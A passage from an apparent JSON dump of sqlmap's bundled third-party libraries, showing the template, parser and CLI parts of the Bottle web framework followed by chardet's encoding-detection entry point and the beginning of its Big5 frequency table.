self.status = 'reload'\n                    thread.interrupt_main()\n                    break\n            time.sleep(self.interval)\n\n    def __enter__(self):\n        self.start()\n\n    def __exit__(self, exc_type, *_):\n        if not self.status: self.status = 'exit'  # silent exit\n        self.join()\n        return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)\n\n###############################################################################\n# Template Adapters ############################################################\n###############################################################################\n\n\nclass TemplateError(BottleException):\n    pass\n\n\nclass BaseTemplate(object):\n    \"\"\" Base class and minimal API for template adapters \"\"\"\n    extensions = ['tpl', 'html', 'thtml', 'stpl']\n    settings = {}  #used in prepare()\n    defaults = {}  #used in render()\n\n    def __init__(self,\n                 source=None,\n                 name=None,\n                 lookup=None,\n                 encoding='utf8', **settings):\n        \"\"\" Create a new template.\n        If the source parameter (str or buffer) is missing, the name argument\n        is used to guess a template filename. Subclasses can assume that\n        self.source and/or self.filename are set. Both are strings.\n        The lookup, encoding and settings parameters are stored as instance\n        variables.\n        The lookup parameter stores a list containing directory paths.\n        The encoding parameter should be used to decode byte strings or files.\n        The settings parameter contains a dict for engine-specific settings.\n        \"\"\"\n        self.name = name\n        self.source = source.read() if hasattr(source, 'read') else source\n        self.filename = source.filename if hasattr(source, 'filename') else None\n        self.lookup = [os.path.abspath(x) for x in lookup] if lookup else []\n        self.encoding = encoding\n        self.settings = self.settings.copy()  # Copy from class variable\n        self.settings.update(settings)  # Apply\n        if not self.source and self.name:\n            self.filename = self.search(self.name, self.lookup)\n            if not self.filename:\n                raise TemplateError('Template %s not found.' % repr(name))\n        if not self.source and not self.filename:\n            raise TemplateError('No template specified.')\n        self.prepare(**self.settings)\n\n    @classmethod\n    def search(cls, name, lookup=None):\n        \"\"\" Search name in all directories specified in lookup.\n        First without, then with common extensions. Return first hit. \"\"\"\n        if not lookup:\n            raise depr(0, 12, \"Empty template lookup path.\", \"Configure a template lookup path.\")\n\n        if os.path.isabs(name):\n            raise depr(0, 12, \"Use of absolute path for template name.\",\n                       \"Refer to templates with names or paths relative to the lookup path.\")\n\n        for spath in lookup:\n            spath = os.path.abspath(spath) + os.sep\n            fname = os.path.abspath(os.path.join(spath, name))\n            if not fname.startswith(spath): continue\n            if os.path.isfile(fname): return fname\n            for ext in cls.extensions:\n                if os.path.isfile('%s.%s' % (fname, ext)):\n                    return '%s.%s' % (fname, ext)\n\n    @classmethod\n    def global_config(cls, key, *args):\n        \"\"\" This reads or sets the global settings stored in class.settings. \"\"\"\n        if args:\n            cls.settings = cls.settings.copy()  # Make settings local to class\n            cls.settings[key] = args[0]\n        else:\n            return cls.settings[key]\n\n    def prepare(self, **options):\n        \"\"\" Run preparations (parsing, caching, ...).\n        It should be possible to call this again to refresh a template or to\n        update settings.\n        \"\"\"\n        raise NotImplementedError\n\n    def render(self, *args, **kwargs):\n        \"\"\" Render the template with the specified local variables and return\n        a single byte or unicode string. If it is a byte string, the encoding\n        must match self.encoding. This method must be thread-safe!\n        Local variables may be provided in dictionaries (args)\n        or directly, as keywords (kwargs).\n        \"\"\"\n        raise NotImplementedError\n\n\nclass MakoTemplate(BaseTemplate):\n    def prepare(self, **options):\n        from mako.template import Template\n        from mako.lookup import TemplateLookup\n        options.update({'input_encoding': self.encoding})\n        options.setdefault('format_exceptions', bool(DEBUG))\n        lookup = TemplateLookup(directories=self.lookup, **options)\n        if self.source:\n            self.tpl = Template(self.source, lookup=lookup, **options)\n        else:\n            self.tpl = Template(uri=self.name,\n                                filename=self.filename,\n                                lookup=lookup, **options)\n\n    def render(self, *args, **kwargs):\n        for dictarg in args:\n            kwargs.update(dictarg)\n        _defaults = self.defaults.copy()\n        _defaults.update(kwargs)\n        return self.tpl.render(**_defaults)\n\n\nclass CheetahTemplate(BaseTemplate):\n    def prepare(self, **options):\n        from Cheetah.Template import Template\n        self.context = threading.local()\n        self.context.vars = {}\n        options['searchList'] = [self.context.vars]\n        if self.source:\n            self.tpl = Template(source=self.source, **options)\n        else:\n            self.tpl = Template(file=self.filename, **options)\n\n    def render(self, *args, **kwargs):\n        for dictarg in args:\n            kwargs.update(dictarg)\n        self.context.vars.update(self.defaults)\n        self.context.vars.update(kwargs)\n        out = str(self.tpl)\n        self.context.vars.clear()\n        return out\n\n\nclass Jinja2Template(BaseTemplate):\n    def prepare(self, filters=None, tests=None, globals={}, **kwargs):\n        from jinja2 import Environment, FunctionLoader\n        self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)\n        if filters: self.env.filters.update(filters)\n        if tests: self.env.tests.update(tests)\n        if globals: self.env.globals.update(globals)\n        if self.source:\n            self.tpl = self.env.from_string(self.source)\n        else:\n            self.tpl = self.env.get_template(self.name)\n\n    def render(self, *args, **kwargs):\n        for dictarg in args:\n            kwargs.update(dictarg)\n        _defaults = self.defaults.copy()\n        _defaults.update(kwargs)\n        return self.tpl.render(**_defaults)\n\n    def loader(self, name):\n        if name == self.filename:\n            fname = name\n        else:\n            fname = self.search(name, self.lookup)\n        if not fname: return\n        with open(fname, \"rb\") as f:\n            return (f.read().decode(self.encoding), fname, lambda: False)\n\n\nclass SimpleTemplate(BaseTemplate):\n    def prepare(self,\n                escape_func=html_escape,\n                noescape=False,\n                syntax=None, **ka):\n        self.cache = {}\n        enc = self.encoding\n        self._str = lambda x: touni(x, enc)\n        self._escape = lambda x: escape_func(touni(x, enc))\n        self.syntax = syntax\n        if noescape:\n            self._str, self._escape = self._escape, self._str\n\n    @cached_property\n    def co(self):\n        return compile(self.code, self.filename or '<string>', 'exec')\n\n    @cached_property\n    def code(self):\n        source = self.source\n        if not source:\n            with open(self.filename, 'rb') as f:\n                source = f.read()\n        try:\n            source, encoding = touni(source), 'utf8'\n        except UnicodeError:\n            raise depr(0, 11, 'Unsupported template encodings.', 'Use utf-8 for templates.')\n        parser = StplParser(source, encoding=encoding, syntax=self.syntax)\n        code = parser.translate()\n        self.encoding = parser.encoding\n        return code\n\n    def _rebase(self, _env, _name=None, **kwargs):\n        _env['_rebase'] = (_name, kwargs)\n\n    def _include(self, _env, _name=None, **kwargs):\n        env = _env.copy()\n        env.update(kwargs)\n        if _name not in self.cache:\n            self.cache[_name] = self.__class__(name=_name, lookup=self.lookup, syntax=self.syntax)\n        return self.cache[_name].execute(env['_stdout'], env)\n\n    def execute(self, _stdout, kwargs):\n        env = self.defaults.copy()\n        env.update(kwargs)\n        env.update({\n            '_stdout': _stdout,\n            '_printlist': _stdout.extend,\n            'include': functools.partial(self._include, env),\n            'rebase': functools.partial(self._rebase, env),\n            '_rebase': None,\n            '_str': self._str,\n            '_escape': self._escape,\n            'get': env.get,\n            'setdefault': env.setdefault,\n            'defined': env.__contains__\n        })\n        exec(self.co, env)\n        if env.get('_rebase'):\n            subtpl, rargs = env.pop('_rebase')\n            rargs['base'] = ''.join(_stdout)  #copy stdout\n            del _stdout[:]  # clear stdout\n            return self._include(env, subtpl, **rargs)\n        return env\n\n    def render(self, *args, **kwargs):\n        \"\"\" Render the template using keyword arguments as local variables. \"\"\"\n        env = {}\n        stdout = []\n        for dictarg in args:\n            env.update(dictarg)\n        env.update(kwargs)\n        self.execute(stdout, env)\n        return ''.join(stdout)\n\n\nclass StplSyntaxError(TemplateError):\n    pass\n\n\nclass StplParser(object):\n    \"\"\" Parser for stpl templates. \"\"\"\n    _re_cache = {}  #: Cache for compiled re patterns\n\n    # This huge pile of voodoo magic splits python code into 8 different tokens.\n    # We use the verbose (?x) regex mode to make this more manageable\n\n    _re_tok = r'''(\n        [urbURB]*\n        (?:  ''(?!')\n            |\"\"(?!\")\n            |'{6}\n            |\"{6}\n            |'(?:[^\\\\']|\\\\.)+?'\n            |\"(?:[^\\\\\"]|\\\\.)+?\"\n            |'{3}(?:[^\\\\]|\\\\.|\\n)+?'{3}\n            |\"{3}(?:[^\\\\]|\\\\.|\\n)+?\"{3}\n        )\n    )'''\n\n    _re_inl = _re_tok.replace(r'|\\n', '')  # We re-use this string pattern later\n\n    _re_tok += r'''\n        # 2: Comments (until end of line, but not the newline itself)\n        |(\\#.*)\n\n        # 3: Open and close (4) grouping tokens\n        |([\\[\\{\\(])\n        |([\\]\\}\\)])\n\n        # 5,6: Keywords that start or continue a python block (only start of line)\n        |^([\\ \\t]*(?:if|for|while|with|try|def|class)\\b)\n        |^([\\ \\t]*(?:elif|else|except|finally)\\b)\n\n        # 7: Our special 'end' keyword (but only if it stands alone)\n        |((?:^|;)[\\ \\t]*end[\\ \\t]*(?=(?:%(block_close)s[\\ \\t]*)?\\r?$|;|\\#))\n\n        # 8: A customizable end-of-code-block template token (only end of line)\n        |(%(block_close)s[\\ \\t]*(?=\\r?$))\n\n        # 9: And finally, a single newline. The 10th token is 'everything else'\n        |(\\r?\\n)\n    '''\n\n    # Match the start tokens of code areas in a template\n    _re_split = r'''(?m)^[ \\t]*(\\\\?)((%(line_start)s)|(%(block_start)s))'''\n    # Match inline statements (may contain python strings)\n    _re_inl = r'''%%(inline_start)s((?:%s|[^'\"\\n])*?)%%(inline_end)s''' % _re_inl\n\n    # add the flag in front of the regexp to avoid Deprecation warning (see Issue #949)\n    # verbose and dot-matches-newline mode\n    _re_tok = '(?mx)' + _re_tok\n    _re_inl = '(?mx)' + _re_inl\n\n\n    default_syntax = '<% %> % {{ }}'\n\n    def __init__(self, source, syntax=None, encoding='utf8'):\n        self.source, self.encoding = touni(source, encoding), encoding\n        self.set_syntax(syntax or self.default_syntax)\n        self.code_buffer, self.text_buffer = [], []\n        self.lineno, self.offset = 1, 0\n        self.indent, self.indent_mod = 0, 0\n        self.paren_depth = 0\n\n    def get_syntax(self):\n        \"\"\" Tokens as a space separated string (default: <% %> % {{ }}) \"\"\"\n        return self._syntax\n\n    def set_syntax(self, syntax):\n        self._syntax = syntax\n        self._tokens = syntax.split()\n        if syntax not in self._re_cache:\n            names = 'block_start block_close line_start inline_start inline_end'\n            etokens = map(re.escape, self._tokens)\n            pattern_vars = dict(zip(names.split(), etokens))\n            patterns = (self._re_split, self._re_tok, self._re_inl)\n            patterns = [re.compile(p % pattern_vars) for p in patterns]\n            self._re_cache[syntax] = patterns\n        self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]\n\n    syntax = property(get_syntax, set_syntax)\n\n    def translate(self):\n        if self.offset: raise RuntimeError('Parser is a one time instance.')\n        while True:\n            m = self.re_split.search(self.source, pos=self.offset)\n            if m:\n                text = self.source[self.offset:m.start()]\n                self.text_buffer.append(text)\n                self.offset = m.end()\n                if m.group(1):  # Escape syntax\n                    line, sep, _ = self.source[self.offset:].partition('\\n')\n                    self.text_buffer.append(self.source[m.start():m.start(1)] +\n                                            m.group(2) + line + sep)\n                    self.offset += len(line + sep)\n                    continue\n                self.flush_text()\n                self.offset += self.read_code(self.source[self.offset:],\n                                              multiline=bool(m.group(4)))\n            else:\n                break\n        self.text_buffer.append(self.source[self.offset:])\n        self.flush_text()\n        return ''.join(self.code_buffer)\n\n    def read_code(self, pysource, multiline):\n        code_line, comment = '', ''\n        offset = 0\n        while True:\n            m = self.re_tok.search(pysource, pos=offset)\n            if not m:\n                code_line += pysource[offset:]\n                offset = len(pysource)\n                self.write_code(code_line.strip(), comment)\n                break\n            code_line += pysource[offset:m.start()]\n            offset = m.end()\n            _str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups()\n            if self.paren_depth > 0 and (_blk1 or _blk2):  # a if b else c\n                code_line += _blk1 or _blk2\n                continue\n            if _str:  # Python string\n                code_line += _str\n            elif _com:  # Python comment (up to EOL)\n                comment = _com\n                if multiline and _com.strip().endswith(self._tokens[1]):\n                    multiline = False  # Allow end-of-block in comments\n            elif _po:  # open parenthesis\n                self.paren_depth += 1\n                code_line += _po\n            elif _pc:  # close parenthesis\n                if self.paren_depth > 0:\n                    # we could check for matching parentheses here, but it's\n                    # easier to leave that to python - just check counts\n                    self.paren_depth -= 1\n                code_line += _pc\n            elif _blk1:  # Start-block keyword (if/for/while/def/try/...)\n                code_line = _blk1\n                self.indent += 1\n                self.indent_mod -= 1\n            elif _blk2:  # Continue-block keyword (else/elif/except/...)\n                code_line = _blk2\n                self.indent_mod -= 1\n            elif _cend:  # The end-code-block template token (usually '%>')\n                if multiline: multiline = False\n                else: code_line += _cend\n            elif _end:\n                self.indent -= 1\n                self.indent_mod += 1\n            else:  # \\n\n                self.write_code(code_line.strip(), comment)\n                self.lineno += 1\n                code_line, comment, self.indent_mod = '', '', 0\n                if not multiline:\n                    break\n\n        return offset\n\n    def flush_text(self):\n        text = ''.join(self.text_buffer)\n        del self.text_buffer[:]\n        if not text: return\n        parts, pos, nl = [], 0, '\\\\\\n' + '  ' * self.indent\n        for m in self.re_inl.finditer(text):\n            prefix, pos = text[pos:m.start()], m.end()\n            if prefix:\n                parts.append(nl.join(map(repr, prefix.splitlines(True))))\n            if prefix.endswith('\\n'): parts[-1] += nl\n            parts.append(self.process_inline(m.group(1).strip()))\n        if pos < len(text):\n            prefix = text[pos:]\n            lines = prefix.splitlines(True)\n            if lines[-1].endswith('\\\\\\\\\\n'): lines[-1] = lines[-1][:-3]\n            elif lines[-1].endswith('\\\\\\\\\\r\\n'): lines[-1] = lines[-1][:-4]\n            parts.append(nl.join(map(repr, lines)))\n        code = '_printlist((%s,))' % ', '.join(parts)\n        self.lineno += code.count('\\n') + 1\n        self.write_code(code)\n\n    @staticmethod\n    def process_inline(chunk):\n        if chunk[0] == '!': return '_str(%s)' % chunk[1:]\n        return '_escape(%s)' % chunk\n\n    def write_code(self, line, comment=''):\n        code = '  ' * (self.indent + self.indent_mod)\n        code += line.lstrip() + comment + '\\n'\n        self.code_buffer.append(code)\n\n\ndef template(*args, **kwargs):\n    \"\"\"\n    Get a rendered template as a string iterator.\n    You can use a name, a filename or a template string as first parameter.\n    Template rendering arguments can be passed as dictionaries\n    or directly (as keyword arguments).\n    \"\"\"\n    tpl = args[0] if args else None\n    for dictarg in args[1:]:\n        kwargs.update(dictarg)\n    adapter = kwargs.pop('template_adapter', SimpleTemplate)\n    lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)\n    tplid = (id(lookup), tpl)\n    if tplid not in TEMPLATES or DEBUG:\n        settings = kwargs.pop('template_settings', {})\n        if isinstance(tpl, adapter):\n            TEMPLATES[tplid] = tpl\n            if settings: TEMPLATES[tplid].prepare(**settings)\n        elif \"\\n\" in tpl or \"{\" in tpl or \"%\" in tpl or '$' in tpl:\n            TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)\n        else:\n            TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)\n    if not TEMPLATES[tplid]:\n        abort(500, 'Template (%s) not found' % tpl)\n    return TEMPLATES[tplid].render(kwargs)\n\n\nmako_template = functools.partial(template, template_adapter=MakoTemplate)\ncheetah_template = functools.partial(template,\n                                     template_adapter=CheetahTemplate)\njinja2_template = functools.partial(template, template_adapter=Jinja2Template)\n\n\ndef view(tpl_name, **defaults):\n    \"\"\" Decorator: renders a template for a handler.\n        The handler can control its behavior like that:\n\n          - return a dict of template vars to fill out the template\n          - return something other than a dict and the view decorator will not\n            process the template, but return the handler result as is.\n            This includes returning a HTTPResponse(dict) to get,\n            for instance, JSON with autojson or other castfilters.\n    \"\"\"\n\n    def decorator(func):\n\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            result = func(*args, **kwargs)\n            if isinstance(result, (dict, DictMixin)):\n                tplvars = defaults.copy()\n                tplvars.update(result)\n                return template(tpl_name, **tplvars)\n            elif result is None:\n                return template(tpl_name, defaults)\n            return result\n\n        return wrapper\n\n    return decorator\n\n\nmako_view = functools.partial(view, template_adapter=MakoTemplate)\ncheetah_view = functools.partial(view, template_adapter=CheetahTemplate)\njinja2_view = functools.partial(view, template_adapter=Jinja2Template)\n\n###############################################################################\n# Constants and Globals ########################################################\n###############################################################################\n\nTEMPLATE_PATH = ['./', './views/']\nTEMPLATES = {}\nDEBUG = False\nNORUN = False  # If set, run() does nothing. Used by load_app()\n\n#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')\nHTTP_CODES = httplib.responses.copy()\nHTTP_CODES[418] = \"I'm a teapot\"  # RFC 2324\nHTTP_CODES[428] = \"Precondition Required\"\nHTTP_CODES[429] = \"Too Many Requests\"\nHTTP_CODES[431] = \"Request Header Fields Too Large\"\nHTTP_CODES[451] = \"Unavailable For Legal Reasons\" # RFC 7725\nHTTP_CODES[511] = \"Network Authentication Required\"\n_HTTP_STATUS_LINES = dict((k, '%d %s' % (k, v))\n                          for (k, v) in HTTP_CODES.items())\n\n#: The default template used for error pages. Override with @error()\nERROR_PAGE_TEMPLATE = \"\"\"\n%%try:\n    %%from %s import DEBUG, request\n    <!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n    <html>\n        <head>\n            <title>Error: {{e.status}}</title>\n            <style type=\"text/css\">\n              html {background-color: #eee; font-family: sans-serif;}\n              body {background-color: #fff; border: 1px solid #ddd;\n                    padding: 15px; margin: 15px;}\n              pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}\n            </style>\n        </head>\n        <body>\n            <h1>Error: {{e.status}}</h1>\n            <p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>\n               caused an error:</p>\n            <pre>{{e.body}}</pre>\n            %%if DEBUG and e.exception:\n              <h2>Exception:</h2>\n              %%try:\n                %%exc = repr(e.exception)\n              %%except:\n                %%exc = '<unprintable %%s object>' %% type(e.exception).__name__\n              %%end\n              <pre>{{exc}}</pre>\n            %%end\n            %%if DEBUG and e.traceback:\n              <h2>Traceback:</h2>\n              <pre>{{e.traceback}}</pre>\n            %%end\n        </body>\n    </html>\n%%except ImportError:\n    <b>ImportError:</b> Could not generate the error page. Please add bottle to\n    the import path.\n%%end\n\"\"\" % __name__\n\n#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a\n#: request callback, this instance always refers to the *current* request\n#: (even on a multi-threaded server).\nrequest = LocalRequest()\n\n#: A thread-safe instance of :class:`LocalResponse`. It is used to change the\n#: HTTP response for the *current* request.\nresponse = LocalResponse()\n\n#: A thread-safe namespace. Not used by Bottle.\nlocal = threading.local()\n\n# Initialize app stack (create first empty Bottle app now deferred until needed)\n# BC: 0.6.4 and needed for run()\napps = app = default_app = AppStack()\n\n#: A virtual package that redirects import statements.\n#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.\next = _ImportRedirect('bottle.ext' if __name__ == '__main__' else\n                      __name__ + \".ext\", 'bottle_%s').module\n\n\ndef _main(argv):  # pragma: no coverage\n    args, parser = _cli_parse(argv)\n\n    def _cli_error(cli_msg):\n        parser.print_help()\n        _stderr('\\nError: %s\\n' % cli_msg)\n        sys.exit(1)\n\n    if args.version:\n        print('Bottle %s' % __version__)\n        sys.exit(0)\n    if not args.app:\n        _cli_error(\"No application entry point specified.\")\n\n    sys.path.insert(0, '.')\n    sys.modules.setdefault('bottle', sys.modules['__main__'])\n\n    host, port = (args.bind or 'localhost'), 8080\n    if ':' in host and host.rfind(']') < host.rfind(':'):\n        host, port = host.rsplit(':', 1)\n    host = host.strip('[]')\n\n    config = ConfigDict()\n\n    for cfile in args.conf or []:\n        try:\n            if cfile.endswith('.json'):\n                with open(cfile, 'rb') as fp:\n                    config.load_dict(json_loads(fp.read()))\n            else:\n                config.load_config(cfile)\n        except configparser.Error as parse_error:\n            _cli_error(parse_error)\n        except IOError:\n            _cli_error(\"Unable to read config file %r\" % cfile)\n        except (UnicodeError, TypeError, ValueError) as error:\n            _cli_error(\"Unable to parse config file %r: %s\" % (cfile, error))\n\n    for cval in args.param or []:\n        if '=' in cval:\n            config.update((cval.split('=', 1),))\n        else:\n            config[cval] = True\n\n    run(args.app,\n        host=host,\n        port=int(port),\n        server=args.server,\n        reloader=args.reload,\n        plugins=args.plugin,\n        debug=args.debug,\n        config=config)\n\n\nif __name__ == '__main__':  # pragma: no coverage\n    _main(sys.argv)\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/__init__.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n\nfrom .compat import PY2, PY3\nfrom .universaldetector import UniversalDetector\nfrom .version import __version__, VERSION\n\n\ndef detect(byte_str):\n    \"\"\"\n    Detect the encoding of the given byte string.\n\n    :param byte_str:     The byte sequence to examine.\n    :type byte_str:      ``bytes`` or ``bytearray``\n    \"\"\"\n    if not isinstance(byte_str, bytearray):\n        if not isinstance(byte_str, bytes):\n            raise TypeError('Expected object of type bytes or bytearray, got: '\n                            '{0}'.format(type(byte_str)))\n        else:\n            byte_str = bytearray(byte_str)\n    detector = UniversalDetector()\n    detector.feed(byte_str)\n    return detector.close()\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/big5freq.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# Big5 frequency table\n# by Taiwan's Mandarin Promotion Council\n# <http://www.edu.tw:81/mandr/>\n#\n# 128  --> 0.42261\n# 256  --> 0.57851\n# 512  --> 0.74851\n# 1024 --> 0.89384\n# 2048 --> 0.97583\n#\n# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98\n# Random Distribution Ration = 512/(5401-512)=0.105\n#\n# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR\n\nBIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75\n\n#Char to FreqOrder table\nBIG5_TABLE_SIZE = 5376\n\nBIG5_CHAR_TO_FREQ_ORDER = (\n   1,1801,1506, 255,1431, 198,   9,  82,   6,5008, 177, 202,3681,1256,2821, 110, #   16\n3814,  33,3274, 261,  76,  44,2114,  16,2946,2187,1176, 659,3971,  26,3451,2653, #   32\n1198,3972,3350,4202, 410,2215, 302, 590, 361,1964,   8, 204,  58,4510,5009,1932, #   48\n  63,5010,5011, 317,1614,  75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, #   64\n3682,   3,  10,3973,1471,  29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, #   80\n4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947,  34,3556,3204,  64, 604, #   96\n5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337,  72, 406,5017,  80, #  112\n 630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449,  69,2987, 591, #  128\n 179,2096, 471, 115,2035,1844,  60,  50,2988, 134, 806,1869, 734,2036,3454, 180, #  144\n 995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, #  160\n2502,  90,2716,1338, 663,  11, 906,1099,2553,  20,2441, 182, 532,1716,5019, 732, #  176\n1376,4204,1311,1420,3206,  25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, #  192\n3276, 475,1447,3683,5020, 117,  21, 656, 810,1297,2300,2334,3557,5021, 126,4205, #  208\n 706, 456, 150, 613,4513,  71,1118,2037,4206, 145,3092,  85, 835, 486,2115,1246, #  224\n1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, #  240\n3558,3135,5023,1956,1153,4207,  83, 296,1199,3093, 192, 624,  93,5024, 822,1898, #  256\n2823,3136, 795,2065, 991,1554,1542,1592,  27,  43,2867, 859, 139,1456, 860,4514, #  272\n 437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, #  288\n3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, #  304\n1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, #  320\n5026,5027,2176,3207,3685,2682, 593, 845,1062,3277,  88,1723,2038,3978,1951, 212, #  336\n 266, 152, 149, 468,1899,4208,4516,  77, 187,5028,3038,  37,   5,2990,5029,3979, #  352\n5030,5031,  39,2524,4517,2908,3208,2079,  55, 148,  74,4518, 545, 483,1474,1029, #  368\n1665, 217,1870,1531,3138,1104,2655,4209,  24, 172,3562, 900,3980,3563,3564,4519, #  384\n  32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683,   4,3039,3351,1427,1789, #  400\n 188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, #  416\n3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439,  38,5037,1063,5038, 794, #  432\n3982,1435,2301,  46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804,  35, 707, #  448\n 324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, #  464\n2129,1363,3689,1423, 697, 100,3094,  48,  70,1231, 495,3139,2196,5043,1294,5044, #  480\n2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, #  496\n 314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, #  512\n 287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, #  528\n3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, #  544\n1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, #  560\n1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, #  576\n1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381,   7, #  592\n2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, #  608\n 265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, #  624\n4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, #  640\n1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, #  656\n5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, #  672\n2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, #  688\n 383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, #  704\n  98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, #  720\n 523,2789,2790,2658,5061, 141,2235,1333,  68, 176, 441, 876, 907,4220, 603,2602, #  736\n 710, 171,3464, 404, 549,  18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, #  752\n5063,2991, 368,5064, 146, 366,  99, 871,3693,1543, 748, 807,1586,1185,  22,2263, #  768\n 379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, #  784\n1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068,  59,5069, #  800\n 585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, #  816\n 690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, #  832\n5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, #  848\n1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, #  864\n 544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, #  880\n3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, #  896\n4224,  57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, #  912\n3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, #  928\n 279,3145,  51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, #  944\n 610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, #  960\n1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, #  976\n4227,2475,1436, 953,4228,2055,4545, 671,2400,  79,4229,2446,3285, 608, 567,2689, #  992\n3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008\n3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024\n2402,5097,5098,5099,4232,3045,   0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040\n5101, 233,4233,3697,1819,4550,4551,5102,  96,1777,1315,2083,5103, 257,5104,1810, # 